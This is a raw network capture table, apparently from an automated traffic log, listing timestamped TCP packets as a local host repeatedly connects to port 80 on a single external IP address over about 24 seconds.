                                                                          Mar 29, 2024 12:10:25.394243956 CET804976145.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:25.394308090 CET4976180192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:25.514123917 CET4976180192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:25.514385939 CET4976280192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:25.732007027 CET804976145.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:25.732095957 CET4976180192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:25.733804941 CET804976245.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:25.733885050 CET4976280192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:25.734046936 CET4976280192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:25.953242064 CET804976245.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:26.032165051 CET804976245.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:26.032365084 CET4976280192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:26.142226934 CET4976280192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:26.362057924 CET804976245.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:26.447014093 CET804976245.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:26.447113991 CET4976280192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:26.561290979 CET4976280192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:26.561569929 CET4976380192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:26.780551910 CET804976245.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:26.780653954 CET4976280192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:26.780754089 CET804976345.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:26.780832052 CET4976380192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:26.780978918 CET4976380192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:27.000169992 CET804976345.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:27.079746008 CET804976345.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:27.079802036 CET4976380192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:27.201584101 CET4976380192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:27.201946020 CET4976480192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:27.420919895 CET804976345.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:27.420994043 CET4976380192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:27.421180010 CET804976445.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:27.421272039 CET4976480192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:27.424287081 CET4976480192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:27.643404961 CET804976445.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:27.727524042 CET804976445.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:27.727580070 CET4976480192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:27.842602015 CET4976480192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:27.842865944 CET4976580192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:28.061912060 CET804976445.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:28.062099934 CET4976480192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:28.062119961 CET804976545.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:28.062206030 CET4976580192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:28.062365055 CET4976580192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:28.284079075 CET804976545.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:28.365735054 CET804976545.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:28.365848064 CET4976580192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:28.482736111 CET4976580192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:28.483077049 CET4976680192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:28.702282906 CET804976545.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:28.702368021 CET4976580192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:28.703574896 CET804976645.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:28.703646898 CET4976680192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:28.703816891 CET4976680192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:28.924356937 CET804976645.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:29.002948999 CET804976645.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:29.003010988 CET4976680192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:29.123661041 CET4976680192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:29.124099016 CET4976780192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:29.343473911 CET804976745.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:29.343734980 CET4976780192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:29.343836069 CET4976780192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:29.344305992 CET804976645.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:29.344368935 CET4976680192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:29.563002110 CET804976745.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:29.647773981 CET804976745.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:29.647958994 CET4976780192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:29.764532089 CET4976780192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:29.764869928 CET4976880192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:29.982435942 CET804976845.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:29.982701063 CET4976880192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:29.982779026 CET4976880192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:29.983849049 CET804976745.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:29.983918905 CET4976780192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:30.200531006 CET804976845.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:30.285660028 CET804976845.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:30.285789013 CET4976880192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:30.404975891 CET4976880192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:30.405420065 CET4976980192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:30.622684002 CET804976845.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:30.622752905 CET4976880192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:30.625096083 CET804976945.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:30.625186920 CET4976980192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:30.625360012 CET4976980192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:30.844969034 CET804976945.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:30.924068928 CET804976945.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:30.924215078 CET4976980192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:31.046070099 CET4976980192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:31.046402931 CET4977080192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:31.266392946 CET804977045.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:31.266416073 CET804976945.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:31.266520977 CET4976980192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:31.266537905 CET4977080192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:31.266789913 CET4977080192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:31.486053944 CET804977045.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:31.580327988 CET804977045.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:31.580431938 CET4977080192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:31.701837063 CET4977080192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:31.702159882 CET4977180192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:31.919930935 CET804977145.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:31.920028925 CET4977180192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:31.920222044 CET4977180192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:31.921272993 CET804977045.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:31.921350002 CET4977080192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:32.137753010 CET804977145.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:32.222223997 CET804977145.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:32.222385883 CET4977180192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:32.346318007 CET4977180192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:32.347337008 CET4977280192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:32.563954115 CET804977145.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:32.564323902 CET4977180192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:32.566004992 CET804977245.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:32.566093922 CET4977280192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:32.566268921 CET4977280192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:32.784776926 CET804977245.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:32.863929033 CET804977245.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:32.864131927 CET4977280192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:32.982726097 CET4977280192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:32.983026981 CET4977380192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:33.200566053 CET804977345.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:33.200802088 CET4977380192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:33.201024055 CET4977380192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:33.201478004 CET804977245.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:33.201555014 CET4977280192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:33.418368101 CET804977345.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:33.519715071 CET804977345.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:33.519792080 CET4977380192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:33.639424086 CET4977380192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:33.639847994 CET4977480192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:33.857043982 CET804977345.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:33.857213974 CET4977380192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:33.860416889 CET804977445.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:33.860490084 CET4977480192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:33.860666037 CET4977480192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:34.081404924 CET804977445.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:34.174215078 CET804977445.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:34.174276114 CET4977480192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:34.295346975 CET4977480192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:34.295639038 CET4977580192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:34.515904903 CET804977445.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:34.515974998 CET4977480192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:34.517797947 CET804977545.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:34.517878056 CET4977580192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:34.518099070 CET4977580192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:34.740305901 CET804977545.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:34.819152117 CET804977545.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:34.819207907 CET4977580192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:34.936032057 CET4977580192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:34.936417103 CET4977680192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:35.155791044 CET804977645.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:35.155885935 CET4977680192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:35.156161070 CET4977680192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:35.158416033 CET804977545.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:35.158487082 CET4977580192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:35.375344038 CET804977645.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:35.474606991 CET804977645.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:35.474710941 CET4977680192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:35.592494965 CET4977680192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:35.592895031 CET4977780192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:35.810530901 CET804977745.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:35.810642004 CET4977780192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:35.810868979 CET4977780192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:35.811729908 CET804977645.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:35.811820984 CET4977680192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:36.028398991 CET804977745.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:36.107671022 CET804977745.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:36.107750893 CET4977780192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:36.217358112 CET4977780192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:36.435029984 CET804977745.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:36.519197941 CET804977745.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:36.519309044 CET4977780192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:36.639288902 CET4977780192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:36.639698029 CET4977880192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:36.857177019 CET804977745.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:36.857300043 CET4977780192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:36.862006903 CET804977845.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:36.862106085 CET4977880192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:36.862356901 CET4977880192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:37.084763050 CET804977845.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:37.167140961 CET804977845.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:37.167206049 CET4977880192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:37.279850006 CET4977880192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:37.280252934 CET4977980192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:37.497788906 CET804977945.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:37.497896910 CET4977980192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:37.498092890 CET4977980192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:37.502238035 CET804977845.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:37.502320051 CET4977880192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:37.715713024 CET804977945.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:37.795223951 CET804977945.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:37.795305967 CET4977980192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:37.906009912 CET4977980192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:37.906377077 CET4978080192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:38.123675108 CET804977945.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:38.123845100 CET4977980192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:38.126919031 CET804978045.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:38.127011061 CET4978080192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:38.127295971 CET4978080192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:38.348558903 CET804978045.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:38.436038971 CET804978045.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:38.436111927 CET4978080192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:38.545685053 CET4978080192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:38.546063900 CET4978180192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:38.764842033 CET804978145.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:38.764969110 CET4978180192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:38.765183926 CET4978180192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:38.766381025 CET804978045.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:38.766454935 CET4978080192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:38.984498978 CET804978145.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:39.078337908 CET804978145.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:39.078479052 CET4978180192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:39.185666084 CET4978180192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:39.185978889 CET4978280192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:39.404701948 CET804978145.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:39.404827118 CET4978180192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:39.408179045 CET804978245.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:39.408267975 CET4978280192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:39.408448935 CET4978280192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:39.630825996 CET804978245.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:39.723113060 CET804978245.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:39.723323107 CET4978280192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:39.842272997 CET4978280192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:39.842586040 CET4978380192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:40.060162067 CET804978345.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:40.060493946 CET4978380192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:40.060558081 CET4978380192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:40.064841986 CET804978245.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:40.064903021 CET4978280192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:40.278758049 CET804978345.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:40.373763084 CET804978345.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:40.373852968 CET4978380192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:40.482719898 CET4978380192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:40.700737000 CET804978345.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:40.780415058 CET804978345.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:40.780469894 CET4978380192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:40.888750076 CET4978380192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:41.106707096 CET804978345.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:41.193089008 CET804978345.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:41.193164110 CET4978380192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:41.311378956 CET4978380192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:41.311682940 CET4978480192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:41.529064894 CET804978345.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:41.529298067 CET4978380192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:41.532115936 CET804978445.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:41.532219887 CET4978480192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:41.536693096 CET4978480192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:41.757565022 CET804978445.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:41.836251974 CET804978445.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:41.836327076 CET4978480192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:41.951683044 CET4978480192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:41.952033043 CET4978580192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:42.173206091 CET804978545.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:42.173302889 CET4978580192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:42.173449993 CET4978580192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:42.174799919 CET804978445.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:42.174864054 CET4978480192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:42.392359018 CET804978545.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:42.475572109 CET804978545.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:42.475642920 CET4978580192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:42.592381001 CET4978580192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:42.592689991 CET4978680192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:42.810329914 CET804978645.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:42.810410976 CET4978680192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:42.810591936 CET4978680192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:42.811202049 CET804978545.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:42.811395884 CET4978580192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:43.028105974 CET804978645.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:43.107403040 CET804978645.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:43.107460976 CET4978680192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:43.222188950 CET4978680192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:43.439831972 CET804978645.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:43.525003910 CET804978645.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:43.525114059 CET4978680192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:43.639056921 CET4978680192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:43.639357090 CET4978780192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:43.858283997 CET804978745.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:43.858304024 CET804978645.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:43.858429909 CET4978680192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:43.858840942 CET4978780192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:43.860066891 CET4978780192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:44.095884085 CET804978745.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:44.182424068 CET804978745.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:44.182483912 CET4978780192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:45.576780081 CET4978780192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:45.577079058 CET4978880192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:45.794564009 CET804978845.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:45.794724941 CET4978880192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:45.795139074 CET4978880192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:45.795386076 CET804978745.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:45.795481920 CET4978780192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:46.012819052 CET804978845.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:46.095664024 CET804978845.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:46.095912933 CET4978880192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:46.217278004 CET4978880192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:46.217643976 CET4978980192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:46.435185909 CET804978845.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:46.435240984 CET4978880192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:46.435316086 CET804978945.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:46.435389042 CET4978980192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:46.435554028 CET4978980192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:46.653013945 CET804978945.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:46.739310026 CET804978945.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:46.739521027 CET4978980192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:46.858117104 CET4978980192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:46.858541965 CET4979080192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:47.076033115 CET804978945.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:47.076210976 CET4978980192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:47.079242945 CET804979045.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:47.079336882 CET4979080192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:47.079530954 CET4979080192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:47.300019026 CET804979045.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:47.384391069 CET804979045.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:47.384449959 CET4979080192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:47.500308037 CET4979080192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:47.500597000 CET4979180192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:47.721129894 CET804979145.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:47.724185944 CET4979180192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:47.724355936 CET4979180192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:47.725213051 CET804979045.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:47.728130102 CET4979080192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:47.940593004 CET804979145.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:48.019238949 CET804979145.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:48.019330978 CET4979180192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:48.139014959 CET4979180192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:48.139277935 CET4979280192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:48.355339050 CET804979145.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:48.355422974 CET4979180192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:48.356708050 CET804979245.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:48.356786013 CET4979280192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:48.356929064 CET4979280192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:48.596076012 CET804979245.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:48.680064917 CET804979245.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:48.680143118 CET4979280192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:48.795450926 CET4979280192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:48.795753002 CET4979380192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:49.012145042 CET804979345.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:49.012243032 CET4979380192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:49.012408018 CET4979380192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:49.013176918 CET804979245.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:49.013235092 CET4979280192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:49.228774071 CET804979345.142.214.240192.168.2.5
